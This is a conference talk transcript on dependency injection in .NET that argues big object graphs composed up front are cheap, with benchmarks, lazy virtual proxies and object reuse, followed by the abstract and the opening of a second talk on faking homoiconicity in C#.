sort of looks scary. This looks complicated. It's really not. It's just a tree, right? Nothing special about it. We could generalize this to say this is a graph. If we reuse some of the things, it's actually a directed acyclic graph. But let's just keep it as a tree. Alright, so what people tend to do instead is something called bastard injection. And I think this is an anti-pattern, but I see this a lot. So because this scares people, they say, well, let's make a decision. I think this is a premature decision. But let's make a decision on saying, well, we'll have a default constructor of bass and we can have another constructor overload that actually takes IQs as input, but we'll have this default constructor that then passes in the real Qooks. And there's all sorts of problems with this. And one of the problems is that if this real Qooks default instance is defined in a different library, you're actually pulling a dependency on that library, which will probably not leave you in a good place. So if any of you saw Robert T. Martin's talk on Wednesday about component design, he actually talked about dependency graphs. So this is bad because it will probably give you a bad dependency graph. The other problem it will give you is you make your decision too early. So you're back to this scenario where it looks like you have a small shallow object graph. But really, what you did was just to make a decision on what's going to happen beneath that bass instance, and now you can't change your mind. So that's not very flexible. So you're making this decision at compile time as you write your code. And that is not where you have most information available to you. You could actually wait and make that decision until your application is actually running because then you know a lot more about the context in which you're running. You might actually know, for example, if you're building a web application, you may know what the incoming request is, and you might actually make some sort of intelligent decision based on what that would be. And if you're running a small device application, you may look at what sort of processes do I have available, or MMR out of memory, or you can make all sorts of interesting decisions based on your environment if you wait. And if you do a bastard injection, you make the decision too early. So you just limit yourself. You constrain yourself, and you constrain the options that you have. So that's really not a good idea. So do defer the composition until the very end. So when do you need to compose your entire object graph, all of your controllers and dependencies and so on? When do you need to do that? So here's a very common application architecture that consists of application model, domain model, data access. So those are just three libraries. I'm not saying that you have to write your software application architecture like this, but often it's helpful to somehow separate it into different modules, different libraries. And the point here is that all of those libraries should just contain classes that use constructor injection. And none of those classes actually make any decision on how they're composed together and what the subtree that they might have, what that actually looks like. So they should not use bastard injection. They're just sitting there with all their incoming constructor arguments and waiting for some third party to compose them together. And that third party is the application route. So that's where you have your entry point entry application, where you really need to actually have this software up and running because there's a user who wants to use this software. That's where you can't really defer that decision any longer because now you actually need to execute the code. So you have that entry point. You compose your object graph, and then you call the root method on your object graph, and it goes to party and do whatever it is that it does. So it might be a controller that has some sort of controller action, and you call into that controller action, and it will then go and call all of its repositories or whatever that is. And you can have something similar happening on a desktop application or batch job or whatever that would be like. All right. So it means that you have to create or defer composition until the last possible moment, and then you have to create that big object graph up front. And I tend to, in my experience, it actually tends to have about the size that I showed you before with all the strange names, but that is actually a pretty typical size of the systems that I'm building anyway. But it might actually be larger. It might actually be something that actually has hundreds of nodes in that graph. So people are concerned. So how does this impact the startup time of my application? Isn't that bad to have to do everything up front, and then only when that graph has been constructed can you actually start using it? Isn't that bad for startup time? And isn't it bad for memory footprint? Because I'm creating a lot of objects, and I may not have to use all of those objects. So what about that? And if you want to fall asleep now, just keep yourself awake for another 20 seconds, none of those are real concerns. Well, they are real concerns, but you should not have them because they're not relevant. And in the next 50 minutes, I'm going to tell you why. But if you take nothing else with you today, just know this. This is not a problem at all. Go and worry about something else. Or have a happy life, if you will. All right, so this all hinges on this one rule, though. So first rule of constructor injection, and I'm not going to say we're not talking about constructor injection. So first rule of constructor injection is actually a pretty sensible rule. The rule is constructors should not do any work. And I think this is actually a pretty good rule overall in application design because if your constructor actually does significant work, you do work in a very implicit manner. And that can be very surprising for the clients that actually call into the code that you're writing. So I think this is just, in general, a very good rule of API design that constructors are for initializing classes, but they're not really supposed to do any real work. So we only do assignment. So as you can see in this little code snippet down on the bottom of the screen, I have this A1 class that apparently seems to take A2 and C1 to I node implementations as input. And the only thing that we actually do is we just assign those incoming constructor arguments to fields, and then we just save those fields for later on. And then we could have more members on this class that actually go and use those fields afterwards. So that's actually the only thing a constructor is allowed to do. And then you go, what about guard clauses? So what if someone actually tries to pass in null as A2, for example? Can't we do a guard clause? Isn't that work? Well, in my opinion, a guard clause against null is not work. It's a patch on a deficiency of the framework. So the framework has this design deficiency. And I actually had the opportunity to talk to Anders Heifberg about that in a roundtable. And he said, yeah, well, the biggest mistake he made on the.NET framework at all was that he did not design a non-nullable reference type. So there is no way you can say in the.NET framework today that I have an interface, but it cannot be null. That is just not possible. And he said, it's impossible to retrofit into the.NET framework today because it would incur too many breaking changes. But as we all know, null is probably the biggest design mistake made in software overall. The original designer of null recently came out, I don't know if you saw that. He recently came out and said, this is probably a design mistake he made back in the 70s that has cost billions of dollars overall throughout the years. How many times do you get null reference exceptions? Some of you actually are going, yeah, well, I get them all the time too. They're just a pain in the ass. So it's OK to do a null guard check here because it just patches your deficient framework. Java is the same, so we don't have to feel bad about that. But anyway, so that's the only thing we can do. So if you accept this rule, everything else that I'm going to tell you today holds true, there is nothing to worry about. What you have here is.NET or Java, for that matter, it also goes for that. Those are essentially object-oriented frameworks. If there's something that they're optimized to do is to create objects, you know, if we had an object-oriented framework that couldn't create objects very fast, it wouldn't be a very good framework or very good runtime. So it's actually, you know, creating objects is just very, very fast, so nothing to worry about. But let's have a look at why there's nothing to worry about. So if we have this rule, though, when is construction ever going to be slow? And I'm actually having a hard time coming up with a good answer to this. I mean, if you don't do any work, so you're not allowed to do a tight loop inside of your constructor because so you can't come up with those kinds of contrived examples. If you don't do any work, if you don't only do assignment, when is construction ever going to be slow? The only answer that can really come up with is if you have a very big assembly and the first time you actually need to load that assembly, it might actually take some time. So you could put, you know, all sorts of binary files and maybe even videos and so on as embedded resources into assembly, and that would actually make that assembly pretty big. And that would actually take a little bit of time to read that assembly from disk and actually do JIT compilation. So that might actually make construction slow because the first time you try to create an instance of a class that's defined within that assembly, it needs to load that assembly. That is the only example that I can really come up with. So it's sort of a semi-exotic corner case already, but it might happen. So let's have a look and see, you know, what would actually happen if we had that sort of scenario. I'll look at that at the moment. So there's all other things like JIT compilation and garbage collection and so on, but that generally just applies with the.NET framework overall. It doesn't really matter whether you're writing loosely a couple code or not. Right. All right. So what I'm going to do next now is just to write instances of this graph here. So I decided to keep it very real and, you know, something that you could really relate to. So I decided to call the nodes a1, a2, and a3, and b1, b2, and b3, and so on. Now I actually decided, I actually thought, well, do I have to make this something that you could relate to, like calling one thing a controller and then a repository and a log and so on. And I thought, you know, what I'm trying to say would probably drown out and now you're actually trying to understand what the application is doing, if you will. So I just wanted to keep it abstract like this because I hope you can map this in your mind and think about what your specific object graphs will look like. So you can imagine that everyone, all the nodes call something with a, resides in an a assembly and all the nodes that calls b is residing in a b assembly. And then we have this c assembly and I've made it red because this is the node that will play the role of the difficult node in the various things that I'm going to do next. So we could, for example, in a couple of minutes, I will let c1 play that role of the node that resides in a big assembly. And we can use c1 as the problematic node, if we will, do various sorts of experiments with it. So I'm going to switch over to Visual Studio now. And what I'm going to do is I'm going to write some tests and I will do a benchmark test first. I'll walk you through why this thing looks like this. So gets tightly coupled equivalent. So the first thing I want to do is just a benchmark. So actually before I start creating in the graphs, I will just create the equivalent of that graph but writing tightly coupled code. And I'll walk you through that and I'll speed up as I go along. But I go a little bit slow in the beginning so that you can actually understand what's going on and then I'll go faster and faster. Yes, you have a question. Can I increase the size of the font? Yes, I can. We're actually on size 12 already. But let's do no. Now I don't want to increase just this one. I want to do it overall because otherwise I have to remember to do. So why is it saying statement completion though? Let's do it a third time around. So let's see what do I need to do here. Text editor. There we go. So 14. Better? No one is complaining. All right. One person is saying yes, no one is complaining. That means an overwhelming majority thinks this is really, really good. All right, so every test that I'm going to write here will always have this structure where I say get test results and then I pass in this code block. And the reason why I do that is because that overall test method called get test results actually runs that code block, I think, a thousand times in a tight iteration and then it measures how long it takes and doesn't average over that. So that's one way to do some sort of pseudo performance measuring out of it. So I'll just do a new tightly coupled A1 and let that be my I node. So there's no graph at the moment. I'll show you the code in a minute. But what you could imagine that I'm doing here is that I am creating an instance of A1 and instead of creating the big object graph up front, I'm just creating that A1 and then as I call into A1, I will tightly couple create my new nodes as I go along and call into those things. So I will do the equivalent work of this graph, but I will just do it in a tightly coupled manner just to do the benchmark. So this whole I node thing here is just for to make it simple. I'm using the same interface all the way through the graph, but you could actually have a graph that consists of different heterogeneous interfaces if you wanted to do that. But I'm just having this I node and the only purpose of this I node interface is to measure itself. So it's very, very meta. So it has this single method called get used instances and this context here is something that can optionally be used to change the behavior of the system if we will. But it just creates an I node moveable of objects and the only thing it actually does is just returns all the objects that were used in calling into that method. So the only purpose of this method is to exist is to measure itself. Kind of meta, but it kind of gives us a pretty good idea of what's going on. So the tightly coupled version of that, what it actually does is it just creates a new tightly coupled A2. So the equivalent of the A2 node and calls the method of that A2 node and it also on the spot creates a new instance of tightly coupled C1, which is the equivalent of the C1 node. So that red node there. So it's creating the first two sub nodes if you will on the spot, concatenating all the results together, concatenating the results with itself because that's the protocol of this thing. This is what actually enables us to measure all the objects that are being created and then returns all of that stuff. And it does that recursively all the way through. Well, not recursively, but down through this graph equivalent if we will. So let's see what that looks like. So this is just our benchmark. Let's see. There we have it. So I have this little test framework here and I'll just refresh the test list, run the test. And as you can tell, as we expected tightly coupled code to be very, very fast. It takes on average 24 ticks. That is 0.0024 millisecond. That is a duration that I cannot really understand in my head. It is very, very fast. And we would expect tightly coupled code to be very, very fast on our object oriented framework. It seems like all our prejudices are still intact. Good. We also see that on average we have seven objects created which fits pretty well because we are expecting somehow seven objects to be involved in this operation. So that's just the benchmark. So let's do the, instead of creating those things on the fly and calling into them, let's actually create the graph first and then call into it afterwards. So that's what this thing about deferring composition is all about. So I'll do the next test and I'll say get playing graph because I'm going to do much more complicated graphs in a minute. And basically the first time here I'm going to walk you through it and then I'll do copy and pasting so it'll speed up the things a little bit. But I'll need a new instance of A1. And as you can tell from IntelliSense, if you can see this, it actually needs an instance of A2. So I'll do a new A2 and I'll look at that. It needs a new B1. I'll do one of those. It needs a new B2. Whoops. And that has a default constructors and I can close this. I can close this. Let's see, B2 also needs an A3. So I'll go back here and create an A3 which has a default constructors. Now I can close this one off. And then I need the C1 node. That requires the B3 node. So that's the object graph. And I'll just copy and paste for now on so you don't have to watch me type this all the time. But I thought the first time was probably a good exercise just to walk you through that. So let's have a look and see what that actually looks like. It's a little bit slower. Actually sometimes I see that it's a little bit faster. But we're looking at 34 ticks at the moment. Sometimes it's just jit compilation that actually makes it slower. So now you can see it's actually down in 19 ticks. So I'm not claiming that constructor injection or big object graph upfront like this is actually either slower or faster. It's just about the same speed. So now you could argue that this is sort of, it doesn't really tell us a lot because what I'm doing at the moment is I'm creating seven objects and then I'm calling a method, a single method on all of those seven objects. And I'm just doing it in two different sequences because in the first example I am doing create an object, call a method on it, create an object, call a method on it. And then in the second example here I'm just creating all the objects first and then I'm calling all the methods on it. But I'm doing it in a tight loop and I'm not waiting at all. So we should really expect this to take just about the same time anyway because we're using all of the nodes right away. So it doesn't tell us a lot. But let's have a look at that scenario then where we have this C1 node that's somehow problematic. So let's start looking at what is that C1 node actually recites and then simply that is big so it takes some time to actually load that node. And let's see what's going to happen because now we will start to see the differences. So I'll go into my nodes. So these are all my nodes. And I'll do a copy of the C1 node because I'm going to need the old C1 node again later on. So I'll just do a copy of that one. I'll rename that to slow C1. So how can we simulate that this takes a long time to load? So it's only going to take a long time to load the first time when it's loading into the app domain because after that it's in the app domain and it's being jit-compiled and so on. So all the subsequent accesses you have to this object that recites in this problematic assembly, that problem goes away after you paid the price. So the way that we can simulate this is by creating a static constructor. So I'll just create a static constructor. That constructor is a constructor that only runs once per lifetime of the app domain. So we can simulate that it's slow to load by just doing a thread.sleep. And let's just say it takes a second to actually load this particular assembly. So let me switch back here and I'll say, well, instead of getting a plain graph, let's get a graph that uses this slow C1. Get graph using slow C1. And obviously I need to go down here and say, well, let's have a look at what's happening when I go slow C1. Let's have a look at that. So we will expect this to be kind of slow and that's exactly what we are seeing. But I think there's an interesting lesson to be learned here because we see that the mean duration is not anywhere near a second. The mean duration here is 0.2 milliseconds and that's probably not that difficult to understand because we're only paying the price of loading this assembly into the app domain once and after that it's just as fast as all the other things. So the price of actually having this thing happening is averaged out over time. So I think there's an interesting thing to be learned here because it might actually seem a little bit counterintuitive before you start thinking about it. And I have to digress a little bit here but I think there's mainly two, I think you divide most applications into two main groups. There's one application group that is basically your web application. So everything that takes in requests from the outside, what is typical about those types of application is that they handle an incoming request and you want to do that as fast as possible and then return the result of that request and then you are done with that. So you basically normally create a graph per request, that's the normal thing, you tend to handle that sort of scenario. So that's your web applications, that's your web services, that's your messaging based application. They typically tend to handle to work in that way and they may have lots of concurrent requests that they need to handle. So you create lots of object graphs all the time and you know, let all of those object graphs go out of scope all the time. And then you have that other type of application here which is, you know, a couple of years ago that would be your desktop application, something that you start up and you run it maybe for hours, maybe even for days. Nowadays, it might also be your mobile device application. Those are very different because you pretty much just load whatever objects you need to actually work this application and then they stay in memory for a long time. So you would probably expect, well before I started thinking about this, I would actually think that this thing about load time would be mostly problematic over in my web scenario but it turns out that on average this thing just disappears in the web scenario because well the first request that comes into a web server that has this problem will obviously pay the price. But we know that in.NET at least that we have this problem even though we're not doing big object graphs up front that the first request that hits a brand new website that's just, you know, being released on IIS will pay the price of doing all the JIT compilation and so on. So that's why we typically tend to do some sort of preheating when we work with.NET web applications. So this problem actually, I would just state now that this problem about loading those big object graphs up front even though you have components that are very slow to load it's not just an issue when you're dealing with web-based applications or request-based applications because it just averages out on time and then after that you don't really have a problem. So now you're on this other side where you say, well what if I'm building a device application or desktop application? I want startup time to be fast because otherwise my users are going to hate me. Fair enough? So we have to think about there are certain things where there are certain prices we have to pay simply to start an application like this and no matter what we do we just have to pay those prices whether we're writing loosely coupled code or whether we're writing tightly coupled code. So but if you have this assembly which is which might be problematic because it loads too slowly then you have to ask yourself whether that actually impacts your design decisions or whether you want to write loosely coupled code or tightly coupled code. So again if you have this scenario where you need to call into that node right away so imagine that you have this C1 node again so that red node and you're starting a desktop application or you know mobile device application and the first thing you need to do when that application actually starts up is to call into that node because that contains important functionality. There's really nothing you can do about that. Now you're having a different sort of problem but it's not a problem related to your decision on whether you're building you know tightly coupled code or loosely coupled code. That's just a different type of problem. So the only scenario where this actually becomes problematic is when you have a very specific combination of circumstances. So you need to do a you know a desktop or small device application. You need to have one of those assemblies that are extraordinarily slow in their load time and you need to have a scenario where you don't actually need to call into this thing right away. If you have that specific sort of exotic combination then you might actually have a concern. So let's have a look at what that would actually look like and why you might want to be concerned. So I'll go back and I'll say well right now I am unconditionally using slow C1 because that is what A1 does at the moment. So my current implementation of A1 just calls both A2 and C1 unconditionally. So that's the scenario I have at the moment. But what if I have another version of A1 that might not always call into C1? What would that look like? So I'll do a copy of my A1 class. Let's put it here. And I will call it conditional A1. So if you were at my talk this Wednesday you would have seen me doing other things called conditional. This is a little bit of a special case because I'm not going to pass in specifications and so on. But basically what it's going to do is it's going to say it's going to look at this context. So this context is sort of like just a weekly type command structure if you will. So in this case I'll just look and see whether it says use C1 and if that is the case I'm just going to return the result of calling into the object graph as usual. So in this case I'm calling into the A2 node and I'm calling into the C1 node just like I did before. So that is the same scenario as before. But if that control structure is not use C1, if that string is not use C1 I'll just skip using that C1 thing. So I still want to use A2 and I still want to concatenate myself because that's the protocol of the interface. And I'm just not creating that, I'm just not using that C1 node at all. So let's have a look at that. So now we're actually in a scenario where we're conditional. And first of all I just want to do a little sanity check so I'll just take that test that I have before and I say get graph using, so I'll say conditionally, conditionally, using slow C1. And I need to pass in that specific string here. So I'll just do that and I'll just do a common page which may make absolutely certain that it actually works. So this should be the exact same scenario as before. So this is just my sanity check that I'll try to see that and which you'd see the same performance profile as before. And it looks like it's just about the same. So that fits, I have reproduced the same scenario as before. So nothing has really changed there. So let me go back and do another one. So let's call this not using slow C1. So obviously I would say don't use C1 down here. So let's go back and have a look at what that looks like. And it's just as slow as before. I should actually say. I forgot to use the conditional. Oh, thank you. So actually all of these two are actually crap. Good catch. Thank you. So let's do conditional. Let's do it again. All right. And we'll do that with the other one. All right. So let's first do the first one again. So that is just my sanity check to see whether I actually did the same thing. And it just clocks out just like it was before. And then I am trying not to using this slow C1. And that actually is very fast. Am I doing something wrong here? Slow C1. Oh, that's because I actually need to. Now it's actually been loaded into the app domain. So I'm just doing a let's do a rebuild here. All right. So let's try it again. All right. OK. So forget the last one. That was just a, it was just cached. But the problem is what we see now is that the time, we actually still paying the time, although we are not using the object because you can see before when I wanted to use that slow C1 node, we used all seven nodes. But now I'm actually saying I don't want to use that node or that sub node. So I don't want to use C1 and B3. So I only want to use the other five nodes. And that is actually also what's happening. The problem is that we are still paying the price. So this is why I could understand why people are concerned about creating those big object graphs up front. Because you're saying, why should I pay the price if I don't want to call into it right away? Surely tightly coupled code must be better because if I do tightly coupled code, I could actually wait until I get into that method call. And then I can have a look at that context and make a decision on whether I want to create that node or not. But we have a trick. And that trick is just about almost 20 years old now. So there's this book called Design Patterns. You've probably heard about it by the Ganger 4. It's from 1994. And it describes a pattern called proxy. And normally when we think about proxy, we think about something that involves doing some sort of remote object call over a network, like something that, you know, where's the, there's a remoting object or a web service on the other hand. But there's a variation described in the book that is called virtual proxy. And the description of a virtual proxy is that it's an implementation of an interface that wraps around an expensive implementation of that interface, but looks like it's the expensive thing, but actually waits the first creation of that expensive resource until you actually need it. And then it starts delegating to it. So that sounds just like what we need. So let's create a virtual proxy. And the virtual proxy sounds like a sort of a scary thing. I mean, it sounds like you need all sorts of various magic things. So let's call it something else. So let's call it lazy C1, because basically if you ever used an ORM, you know, an object relational map, like in Hypernate or entity framework, you probably have seen this thing like lazy initialization. And that is basically the same thing. So let's call it lazy C1. I could actually just have called it I node, lazy node. Let's call it lazy C1. And what I want to do is I want to take a dependency on a lazy of t, or more specifically a lazy of I node. So if you know lazy of t, that is just a base class library class that does lazy initialization. So let's call that lazy node. All right. So now we have a lazy node. So basically we can implement this by returning the value of calling into this.lazy node. And then when I dot into value, or where the code actually tries to read value, that's where you have lazy initialization. So that's where the object is actually going to be created. So now I can, and the value is an instance of I node. So now I can call get used instances into that, passing in the context. And then again, concatenating myself just to, you know, make measurements correct in the sense that now we're also counting this specific lazy node. So I can go back and take a copy of my current test, paste it in here. And I can say, I need to wrap this sub node, so the C1 and B3 sub node, I need to wrap that with that virtual proxy or that lazy C node. So I will just go there and say, well, let's have a new lazy C1. And the constructor of that takes a lazy of I node. So let's do a new lazy of I node. The constructor of lazy of I node has different overloads. One of the overloads allows me to pass in a funk of I node. So I'll just put that arrow in here, and I'll need to close this a couple of times. And I'll actually just decorate this thing. Ah, I need to. So let's call that lazy, slow C1. All right. So let's go back and see whether that actually helps us. All right. So we're back at nine ticks and five objects. So instead of having to change my architecture or, you know, revert back to tightly coupled code because it looks like I have a problem, I can actually just make a decision at a very late, late time into my project lifetime and say, well, it seems like this is actually problematic. So I will change my mind of how to compose this object graph, and I will just slide in that extra node into the tree, and then, you know, because I kept my options open, I was now able to deal with this problem. So just to do a sanity check here, let's just do the, let's just see if it still works if we actually want to use it. So let's have one that says using that thing. And I'll just do this. Oops. And now we should, now we're actually using the C1 node again. So now we would imagine or we should expect it to be just as slow as before because we have to pay the price. And you will see that is also the case. And you also see that now we have eight objects instead of just seven before. So in this case where we actually need that slow C1 node, we're actually paying that very, very small price of adding an extra object because that is that lazy C1 node that I added here. But as we've seen, you know, creating objects in general is very, very fast. So I think, you know, this is a price that is almost nonexistent. All right. So just to recap so far, this whole idea about being worried about composition time is really not something that you need to be worried about because even if you have this very special combination of circumstances where you're building a desktop app or a mobile device app and you have this sort of assembly that's very, very big and it's going to take time to load and you don't need it right away, you can still get around that sort of issue by using this virtual proxy or that lazy initialization pattern here and deal with objects composition time. So in general, this is just something that is very, very fast. So it's not really a problem. So there's the other concern. And the other concern is this concern about memory footprint or object footprint, if you will. So if you look at the graph again, now let's imagine, let's reset everything. So let's imagine that C1 is not in an assembly that's, you know, very big and so on. So it's not that it's problematic or it takes time to actually create it. But let's imagine that we have another problem. So imagine that we're having now a web application or some sort of request-based application and that the typical scenario involves that we're calling into A2 all the time. And that is actually our main way through the application. But just once in a while, we need to call into C1. Not that often, but just once in a while. It might be some sort of semi-extraordinary circumstances that requires us to invoke the C1 node once in a while. So you could say, well, we could use this virtual proxy again to deal with that. But in general, you could just say, well, why should I create that C1 node and that B3 node every time if I'm only going to use it for one out of 100 requests? Because that might actually add to my memory footprint. And I'm not really using those nodes at all. So why should I have to do this upfront? I think that's a pretty good question. Why would you need to create those nodes all the time? Why are you actually creating all of those nodes all the time? Well, right now, I've just been creating all of those nodes all the time because I want to measure how fast it is. But in general, if you have incoming requests in your system, why are you creating the object graph from scratch every time? There might be good reasons for that, but it's not always necessary to do that. So let's do something else. So let's go back to the original plain graph that I had and have a look at what we could do with that. So what if we say that C1 node is actually problematic or not problematic, but we don't want to use that every time. So we don't want to create it every time. So why don't we just reuse them? Let's do call it reusing. So instead of creating new C1 and its child B3 every time, let me just cut that here. Let's say var C1 and just put it here, and I'll just put it back here. So now I'm reusing the C1 node in all the different requests that comes in. What happens then? So it still takes about the same time, in this case 39 ticks. But as you will see on average now, I'm only using five objects. And I'm not in this conditional scenario at the moment. Now I'm actually in this scenario where I'm calling into all of them. But even though I'm actually calling into all of them, I'm only using five objects. How could that be? Well it's actually not five objects. It's actually 5.000 something. But it just turns out that those two objects are being reused across thousands of different requests. So on average, you just don't see that because it's the same object all the time. So this is also known as the singleton lifetime style pattern in dependency injection pattern language. And you shouldn't confuse that with the singleton design pattern. They're slightly different, but they have the same effect. So we're actually reusing that node. Then you could ask yourself, why am I not doing this all the time? And that is actually a pretty good question. But there is one good reason for not doing this all the time. And that is especially if you have some sort of web-based application where you have concurrent requests. So what happens is you have lots of requests arriving at the same time. And they will then act upon this object graph from concurrent threads. So if you want to reuse those objects across different threads, they need to be thread safe. And not all classes in the base class library are actually thread safe. So you need to be aware of which subparts of your graph are actually going to be thread safe. But everything that you have where the entire subgraph is thread safe, you could just as well just reuse that and say, well, there's going to be one instance of that object for the entire lifetime of that application. And we're just going to reuse those over and over again. That's just going to be much more efficient. And then you're thinking, well, writing thread safe code is actually hard. And I would actually say writing thread safe code is very, very easy if you just write your services as immutable objects. And it's actually not that hard because services tend to be mostly about behavior anyway. So they tend to not have a lot of changing state anyway. So lots of services can actually be written as immutable implementations. And that will automatically make them thread safe. So if you'd noticed here in this conference, there's been this focus on functional programming. One of the things functional programming gives you is it has this emphasis on immutable data and immutable behavior. So that's just another reason why functional programming is very, very interesting because it actually allows you to reuse those things over and over again. All right. So I have a little time left. So let's have a look at something else. But before I do that, let's just recap that. So memory footprint will typically also not tend to be a problem even though you do big object graphs up front because you can just reuse all your objects. And if you can't reuse any of your objects, you should probably take a good look of whether you actually chose the correct implementation for your dependencies. All right. So I actually think that there's really nothing to worry about. Then there's a little extra worry that some people actually come with because then they say, well, that is all fine because up until now, the only thing I've shown you is something that involves lots of uses of the new keyword. But dependency injection, isn't that something about DI containers, dependency injection containers? And lots of people like to use DI containers. And I think DI containers have a good use case. I don't use them always, but I use them often. But then you've heard that DI containers work by reflection. So they use reflections to actually create object graphs. And you may have heard that reflection is very, very slow. So is that not then a cause of concern? If we use dependency injection containers, isn't this going to be slow then? So let's have a look and see whether it's going to be slow. So I will do a new test. This is the second to last test that I'm going to write. Let's do get graph resolved, let's say, composed by... So I'll use something called Castle Windsor, but it could pretty much have been any DI container. So I'll create a new instance of container. That's got to be a new Windsor container. And I'll just need to configure that thing. So I'll install something called the graphs installer into it. This is just... I've just packaged away all the configuration of the container that knows how to create this node. So that's not really very interesting. So I could have used auto-fact, ninject or whatever else, and the result would pretty much have been the same. So I'll do container.resolve. And I will resolve the inode. And I'll just see what happens then. All right, so let's run this one. 125 ticks. It's slower than just creating an object graph with plain new keywords. If I do it one more time, you will actually see now we're down to 6 to 6. So part of that measurement, the first measurement is actually because of JIT compilation. So it is slower than creating object graphs just with a new keyword, but it's not even 10 times as slow. It's maybe eight or nine times or maybe five times as slow as using the new keyword. But that's about it. And this is because even though reflection tends to be kind of slow compared to using the new keyword, these containers have lots of optimization built into them. So when they've seen a request at one time, they actually know what it is that they're looking for, and they actually do all sorts of optimization techniques where they can remember what you asked of before, so they don't have to do the same work over and over again. So they actually pretty well optimized. So it's a little bit slower, but it's not all those of magnitudes at all. It's maybe eight or nine times as slow as it looks right here anyway. And I just want to put this into perspective then because we're looking at things that are sub, sub, sub millisecond at the moment, it's really, really hard to actually relate to these numbers. So let's just do something that is more normal. So the last thing that I'm going to do is I will create a new node. I wonder if this actually compiles. Where's the last curly bracket? Well, it does compile. I wonder where that went. Hmm. Ah. Well, anyway, let's see what happens. I want to see if this compiles. Okay, this compiles. So what I'm doing here is now let's actually do some work. So so far we've just been counting stuff and not really been doing anything. So now I want to introduce this thing called the database reading C1. So again, C1 node is the problematic node. And basically what it's going to do when we invoke it is it's going to call this getData help of private helper method. And as you can tell, the getData private helper method actually expects the input to be a connection string. So I need to use the context as though it was a connection string. And it's simply going to create a new SQL connection, pick a random number between 1 and 10,000, do a select into a table that I have here on my local machine, just selecting the row that has this corresponding ID, and turn that into a string, return the string as data, and then I'm passing the data as context into the B3 node. And I'm doing this simply just because I didn't want the C sharp compiler to optimize away that data variable if it wasn't being used. So I'm sure that it's actually being used now. So we should expect this to be different when we try to use this one. So let's do the original playing graph and just use the database reading node instead. So get, let's say getGraph, readingDB, something like that. And obviously we should go database reading C1, and I need to pass in a connection string here. I have one already. So that's pretty much it. So let's have a look and see what that actually looks like. So that's just putting things into perspective. So the funny thing is that, so it clocks in at 2,300 ticks or 0.23 milliseconds. So the interesting thing, or the funny thing is that it seems to be about the same as this slow C1 node thing. It's actually just a coincidence. I've actually sometimes run this on my laptop, and it's been like 4,000 ticks instead of 2,000 ticks. But I think the point here is that compared to all the object graphs that we've created so far, if we just forget about this slow C1 node here, it's just orders of magnitudes, more work that's actually required actually reading something out of a database. And you would probably, I mean, I would guess most of you work with code that does some sort of IO. If you don't talk to SQL Server, you probably talk to some other sort of persistence engine that's on a different part of the network than actually the machine that's running your code. So I think you were, most cases, the most customers that I've actually consulted would be very, very happy if they could have a round trip to that database that on average took 0.2 milliseconds. Usually when we do database access, we measure the access time in milliseconds. The reason why this is fast is not because I'm a hot developer or anything, it's just because I'm running SQL Server on my local machine. The table's not very big, so it's probably fit into memory. There's no network latency at all involved, and I'm doing a lookup on a primary clustered index, and there are no joins involved. So you can't really make a database lookup that's much faster than that anyway. But even so, it's just a completely different thing. So I think the whole point that I'm trying to get across here is that you shouldn't really worry about the composition time and all of the performance implications of doing loosely coupled code because the real work in your application probably happens somewhere else, and that is probably what you should worry about. But I still hear people all the time being worried about the performance implications of using inversion of control. And I hope I've been able to convince you now that you don't really have to be worried about those things. So to wrap up, do defer composition until you actually know what it is that you need to compose. And you don't have to worry about startup time because usually it's not going to be a problem. You are looking at an object-oriented framework. It creates objects blindingly fast. And if you ever get into that sort of problem where it is a problem, or the situation where it is a problem, you can use this virtual proxy or this latent initialization pattern to get around that. An object count is also or should not be an issue either because you can reuse objects across various requests. So that will actually make things very, very efficient. It might actually make things more efficient that you could do if you use tightly coupled code because you can control at composition time whether you want to reuse things or not. When you write tightly coupled code, you're pretty much saying, new, new, new every time, so you're creating lots of objects. And there's really no way to change your mind about that. So I would actually say you can write much more efficient code writing loosely coupled code because you can change your mind of how you want this composition to happen after you've measured how it actually turns out. All right. So that's pretty much what I have. My name is Mark Siegman. As you can tell, I have this book called dependency injection in.NET. It's still available in bookstore or upside if you don't have it. I would definitely recommend that you go and buy it so I can earn a little bit of money. If you have questions, I have six minutes left. Otherwise, welcome to contact me. All my contact information is on the blog or here on Twitter. But let's see if we have any questions or if you just want to go to lunch. No questions? All right. Going once, going twice. All right. Thank you all for coming. Have a good day the rest of the day.
|
A corollary to the Composition Root and Register Resolve Release patterns is that object graphs should be composed up front, sometimes well in advance to when a particular dependency is needed. Such object graphs can potentially become quite big, which tends to make some people uneasy. Isn't it terribly inefficient? No, it almost never is, and in the few cases where it is, there are ways to get around it. This session examines big object graphs composed with and without Dependency Injection containers, using simple code examples.
|
10.5446/51473 (DOI)
|
So, good afternoon everyone. I guess that if we apply a strict algorithm to this greeting, I think it's still in the afternoon, but it's very soon the evening, so I could say good evening to you instead. So, this is the last talk of the day. I hope that you have a good conference so far. The talk is called Faking Homo-Iconicity in Susharp with graphs. My name is Mark Seaman and I am an independent consultant and advisor who dabbles in object-oriented design, functional programming, test-driven development, software architecture, those kinds of things. I'm also one of the founding partners in a company called Green that's just getting off the runway at the moment, and one of my partners recently told me a story. So, he went to Moscow to meet with some potential clients of ours, and while meeting with those clients, he had to go to lunch with them. Horrible, yes, but sometimes necessary. No, I'm just kidding, really. And apparently that lunch restaurant that they went to was kind of a fancy place because after they receded, each guest were given an iPad, and on that iPad was a custom app that you could then use, and obviously you could read a little bit about the restaurant, but you could also produce the menu and figure out exactly what you wanted for that particular lunch. So, you could make your selection, and maybe you could even customize that selection at extra caviar, it is Russia, right? So, you want extra caviar with that. And then when they were all done, they would, you know, the waiters would come back and it collects the iPad, so they weren't given the iPad, it was just, you know, for loan. So, she took the iPad and then she went to the next table over and just put the stack of iPads on the table and looked at the first one, the top one in the stack, and then pulled out a pencil and a piece of paper and started copying off all the, you know, entries that they made and into a piece of paper. And then, you know, in old fashioned way, went out to the kitchen and gave the cook that piece of paper. So, that's so much for fancy iPad digitalization of the restaurant business. So, apart from being a slightly funny story, it also highlights that doing complex data entry and processing is sometimes harder than we actually think it is, or we tend to underestimate the effort that goes into those sort of software systems. And that is something that I want to talk about today, one of the topics or one of the themes for this talk. So, on the agenda for the next hour, slightly less than an hour now, is I want to talk about three things. So, first of all, I want to introduce this concept of homo-iconicity for those of you who are not familiar with it. And those of you who are familiar with it, you just bear with me for a little while because I'm not going to spend that much time with that. And then, when I've talked about this, there comes this realization that this is not something that we can do in our normal programming languages like Cisharpa Java or anything else. So, what then, what can we do then? It turns out we can actually fake it. And the way that we can fake it is by using polymorphic object graphs. And it turns out that when we start doing this, we can actually do interesting things with those polymorphic object graphs like transforming and manipulating those 